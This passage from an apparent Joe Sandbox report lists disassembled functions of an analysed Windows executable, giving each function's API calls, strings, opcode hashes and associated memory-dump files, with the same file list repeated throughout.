                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bf0067fdc715ad62ea400fca28faee1260d6c25cd8764403d7545c4f3a7dbe9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B213CB5908301DFC304DF64D985B9ABBE4FF98710F004A2EF45A83290EB74D588CB96
                                                                                                                                                                                                                                                                                                Function 00402590 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402044$CPUIdleTime
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2665702501
                                                                                                                                                                                                                                                                                                • Opcode ID: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                                • Instruction ID: 11bcaded1eea4243ffe6df52d9d88ed76b2ab53cb2a3c081b775842c2c83da62
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1182B1644601AFD314DF14DD85FAAB7A4FF48B20F10862EF55EA32D0DB78A844CB59
                                                                                                                                                                                                                                                                                                Function 00402660 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402045$CPUUsageExceed
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-436957165
                                                                                                                                                                                                                                                                                                • Opcode ID: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                                • Instruction ID: ba179efc8f1fc514a3e2d6bea4a1845afbd83289b5d047454f20136ff34bde4d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB1191B1644601BFD310DF14DD85FAAB7A8FF48B14F108A2EF55EA22D0DB78A844CB59
                                                                                                                                                                                                                                                                                                Function 0045CF60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,1088D068,?,?,?,00478D19,000000FF,0045997D,?), ref: 0045CF8C
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00000080,00000007,00000000,00000003,20000000,00000000), ref: 0045CFE9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                                                                • API String ID: 415043291-4282027825
                                                                                                                                                                                                                                                                                                • Opcode ID: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                                • Instruction ID: 901598558c3e4d11bc3258ba10a6420141faa6f62916cefdcf4a46bf13df9223
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB1173766083009FE310CB54EC89F5BB7A9FB84721F10492EF959973D0D7789848C795
                                                                                                                                                                                                                                                                                                Function 0041DB30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?,?,75A7AF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateDriveDrivesInitializeInstanceLogicalTypeUninitialize
                                                                                                                                                                                                                                                                                                • String ID: C:\
                                                                                                                                                                                                                                                                                                • API String ID: 16435998-3404278061
                                                                                                                                                                                                                                                                                                • Opcode ID: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                                • Instruction ID: b0155039b9989220c3f10694d0f533bb6dad7ff0edda0b00871a7334ab537921
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2901D4B6A183119B8314DF28DCC56AB73A5EB89314B01453FE45AC7251EB78AC84CBCA
                                                                                                                                                                                                                                                                                                Function 0042CF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CF9B
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042CFF6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageRedrawSendWindow
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 1030633669-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 322b72833a8646d25a97c7267da0ac355cbd00ada31bdbfef420a7c5b9529279
                                                                                                                                                                                                                                                                                                • Instruction ID: d25022c26ba7c65596874a3e6aca49c08802d942c9937e1375339a52bc2b998b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 322b72833a8646d25a97c7267da0ac355cbd00ada31bdbfef420a7c5b9529279
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46018B313006119BD7349A79DA89FDFB3A5AB94700F15481FF24ABB2C0CAF47881C64C
                                                                                                                                                                                                                                                                                                Function 0041A7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20registryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegOpenKeyW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\services\BootDefrag), ref: 0041A7F7
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 0041A811
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: PathFileExistsW.SHLWAPI(?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: SHCreateDirectory.SHELL32(00000000,?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • SYSTEM\CurrentControlSet\services\BootDefrag, xrefs: 0041A7E5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Path$CloseCreateDirectoryExistsFileFolderOpenSpecial
                                                                                                                                                                                                                                                                                                • String ID: SYSTEM\CurrentControlSet\services\BootDefrag
                                                                                                                                                                                                                                                                                                • API String ID: 2992731242-3464295076
                                                                                                                                                                                                                                                                                                • Opcode ID: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a09b35f9698f17151a02b8af7ff6770b374517e2ed940df591338b91f7cf978
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02D012B0215200DAE314BBB1DC45B9E33A4EB40315F10492EB45AC1580CB7894998B6A
                                                                                                                                                                                                                                                                                                Function 00401270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateExchangeInterlocked
                                                                                                                                                                                                                                                                                                • String ID: }I
                                                                                                                                                                                                                                                                                                • API String ID: 1770991917-1906338323
                                                                                                                                                                                                                                                                                                • Opcode ID: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                                • Instruction ID: a163272bfcbb607c39215aeccd5f887c100e22747e7019c329861ded96e1c357
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64D05E2390012056CA10521ABC48FE6672CAF91360F46427EF80DF71609329A8424AAC
                                                                                                                                                                                                                                                                                                Function 004012A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 004012B2
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004012C4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
